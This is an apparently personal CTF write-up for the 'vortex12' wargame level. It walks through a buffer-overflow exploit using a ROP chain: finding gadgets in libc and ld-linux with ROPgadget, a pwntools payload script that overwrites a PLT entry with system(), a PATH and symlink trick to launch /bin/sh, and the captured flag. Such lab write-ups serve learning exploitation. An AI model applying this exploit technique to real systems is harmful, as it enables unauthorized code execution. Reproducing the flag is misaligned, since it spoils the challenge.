vortex12

in this challenge we need to use ROP chain in order to exploit the buffer overflow. we will find our gadgets in libc.so.6, and in ld-linux.so.2.

using this command we can see where every file is loaded:

ldd /vortex/vortex12

/lib/i386-linux-gnu/libc.so.6 (0xf7d7d000) /lib/ld-linux.so.2 (0xf7fc9000)

find “pop eax”, “pop edx”, in libc.so.6

ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 --only "pop|ret" | grep -E "pop (eax|edx) ; ret"

pop eax -> 0x0012b311 (in libc.so.6)
pop edx -> 0x0003be0d (in libc.so.6)

then, find “mov [edx], eax”, in ld-linux.so.2

 ROPgadget --binary /lib/ld-linux.so.2 --only "mov|ret" | grep -E "mov .* \[edx\], eax ; ret"

mov [edx], eax -> 0x0001250b (in ld-linux.so.2)

we only need to call exit, so, first let’s find “mov eax, 1”.

ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 --only "mov|ret" | grep -E "mov eax, 1"

mov eax, 1 -> 0x0005cdb5 (in libc.so.6)

and then, call the kernel using “int 0x80”.

ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 --only "int"

int 0x80 -> 0x00039ed4 (in libc.so.6)

now, we can see it tries to run this command, system("%d")

first we need to adjust the PATH variable:

export PATH=.:$PATH

and then, create link to /bin/sh using this command:

ln -sf /bin/sh "%d"

#!/usr/bin/python3
import sys
from pwn import p32

plt_printf_address = 0x0804c004
# plt_printf_address = 0xdeadbeef
system_address = 0xf7dcd430

base_address_ld_linux = 0xf7fc9000 # address in the code where /lib/ld-linux.so.2 is loaded
base_address_libc = 0xf7d7d000 # address in the code where  /lib/i386-linux-gnu/libc.so.6 is loaded

pop_eax = base_address_libc + 0x0012b311
pop_edx = base_address_libc + 0x0003be0d

mov_into_edx_eax = base_address_ld_linux + 0x0001250b

mov_eax_1 = base_address_libc + 0x0005cdb5
int_0x80 = base_address_libc + 0x00039ed4
# mov [plt_printf_address], system_address
payload = b'A'*1036

payload += p32(pop_eax)
payload += p32(system_address) # eax = system_address

payload += p32(pop_edx)
payload += p32(plt_printf_address) # edx = plt_printf_address

payload += p32(mov_into_edx_eax) # mov [plt_printf_address], x`system_address

payload += p32(mov_eax_1) # mov eax, 1
payload += p32(int_0x80) # int 0x80

sys.stdout.buffer.write(payload)

finally :)

Flag: kklZMRIrj

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.